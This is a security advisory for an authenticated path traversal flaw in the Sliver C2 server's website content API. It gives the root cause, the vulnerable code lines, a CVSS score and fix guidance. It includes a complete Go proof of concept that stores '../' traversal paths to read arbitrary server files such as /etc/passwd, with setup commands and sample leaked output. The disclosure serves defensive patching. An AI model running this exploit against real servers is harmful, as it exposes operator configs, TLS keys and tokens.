PT-2026-6843 — Github.Com/Bishopfox/Sliver

PT-2026-6843 · Go · Github.Com/Bishopfox/Sliver

Published

2026-02-05

Updated

2026-02-05

CVSS v3.1

6.5

Medium

Vector

AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Summary

A Path Traversal vulnerability in the website content subsystem lets an authenticated operator read arbitrary files on the Sliver server host. This is an authenticated Path Traversal / arbitrary file read issue, and it can expose credentials, configs, and keys.

Affected Component

Website content management (gRPC): WebsiteAddContent, Website, Websites
Server-side file read in Website.ToProtobuf

Impact

Arbitrary file read as the Sliver server OS user.
Exposure of sensitive data such as operator configs, TLS keys, tokens, and logs.

Root Cause

The server accepts and persists arbitrary website paths from the operator, then later reads from disk using that path without sanitization or containment.

Vulnerable Code References

server/rpc/rpc-website.go:100 — accepts content.Path from operator RPC and persists it via website.AddContent
server/db/models/website.go:52 — reads from disk with filepath.Join(webContentDir, webcontent.Path) without validating or constraining webcontent.Path

Proof of Concept (PoC)

Steps (local test)

Build the server:

go build -mod=vendor -tags go sqlite,server -o sliver-server ./server

Create an operator config (permission all for website operations):

./sliver-server operator -n testop -l 127.0.0.1 -p 31337 -P all -o file -s /tmp

Start the daemon:

./sliver-server daemon -l 127.0.0.1 -p 31337

Run the PoC:

GOFLAGS=-mod=vendor go run ./poc/website path traversal.go -config /tmp/testop 127.0.0.1.cfg -website poc-site -target /etc/hosts

PoC Code

package main

import (
	"context"
	"flag"
	"fmt"
	"os"
	"path/filepath"
	"runtime"
	"strings"
	"time"

	"github.com/bishopfox/sliver/client/assets"
	"github.com/bishopfox/sliver/client/transport"
	"github.com/bishopfox/sliver/protobuf/clientpb"
)

func main() {
	var (
		configPath string
		websiteName string
		targetPath string
		webPath   string
		maxBytes  int
	)
	flag.StringVar(&configPath, "config", "", "path to sliver client config (.cfg)")
	flag.StringVar(&websiteName, "website", "poc-site", "website name to use/create")
	flag.StringVar(&targetPath, "target", "", "absolute server file path to read")
	flag.StringVar(&webPath, "web-path", "", "override web path (defaults to traversal into target)")
	flag.IntVar(&maxBytes, "max-bytes", 1024, "max bytes of leaked content to print")
	flag.Parse()

	if targetPath == "" {
		if runtime.GOOS == "windows" {
			targetPath = `C:WindowsSystem32driversetchosts`
		} else {
			targetPath = "/etc/passwd"
		}
	}

	if webPath == "" {
		trimmed := strings.TrimPrefix(targetPath, string(filepath.Separator))
		webPath = "../../../../../../../../" + trimmed
	}

	config, err := loadConfig(configPath)
	if err != nil {
		fatalf("config error: %v", err)
	}

	rpc, conn, err := transport.MTLSConnect(config)
	if err != nil {
		fatalf("connect error: %v", err)
	}
	defer conn.Close()

	ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second)
	defer cancel()

	 , err = rpc.WebsiteAddContent(ctx, &clientpb.WebsiteAddContent{
		Name: websiteName,
		Contents: map[string]*clientpb.WebContent{
			webPath: {
				Path:    webPath,
				ContentType: "text/plain",
				Content:   []byte("poc"),
			},
		},
	})
	if err != nil {
		fatalf("WebsiteAddContent failed: %v", err)
	}

	resp, err := rpc.Website(ctx, &clientpb.Website{Name: websiteName})
	if err != nil {
		fatalf("Website failed: %v", err)
	}

	var leaked *clientpb.WebContent
	for , c := range resp.Contents {
		if c.Path == webPath {
			leaked = c
			break
		}
	}
	if leaked == nil {
		fatalf("did not find content for path %q", webPath)
	}

	data := leaked.Content
	if len(data) > maxBytes {
		data = data[:maxBytes]
	}

	fmt.Printf("[+] target: %s
", targetPath)
	fmt.Printf("[+] web-path: %s
", webPath)
	fmt.Printf("[+] leaked bytes: %d
", len(leaked.Content))
	fmt.Printf("[+] preview:
%s
", string(data))
}

func loadConfig(path string) (*assets.ClientConfig, error) {
	if path != "" {
		return assets.ReadConfig(path)
	}
	configs := assets.GetConfigs()
	if len(configs) == 0 {
		return nil, fmt.Errorf("no configs found; use -config")
	}
	if len(configs) > 1 {
		return nil, fmt.Errorf("multiple configs found; use -config")
	}
	for , c := range configs {
		return c, nil
	}
	return nil, fmt.Errorf("unexpected config error")
}

func fatalf(format string, args ...any) {
	fmt.Fprintf(os.Stderr, format+"
", args...)
	os.Exit(1)
}

Expected Output (example)

[+] target: /etc/hosts
[+] web-path: ../../../../../../../../etc/hosts
[+] leaked bytes: 409
[+] preview:
127.0.0.1	localhost
...

Evidence (Screenshots)

Why It Works

WebsiteAddContent accepts a path like ../../../../etc/hosts and stores it.
Website returns content by calling Website.ToProtobuf, which reads from disk using the stored Path value.
filepath.Join does not prevent traversal, so the server reads from outside the web directory.

Recommended Fix

Validate and reject paths that are absolute or contain .. in WebsiteAddContent (server side).
Canonicalize paths and enforce they remain within the web content directory.
Avoid reading content by Path in Website.ToProtobuf; read by content ID instead.

Notes

This issue requires an authenticated operator account with sufficient permissions (PermissionAll).
The PoC demonstrates reading /etc/hosts but can target any readable server file.

Fix

Path traversal

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-22

Related Identifiers

GHSA-2286-HXV5-CMP2

Affected Products

Github.Com/Bishopfox/Sliver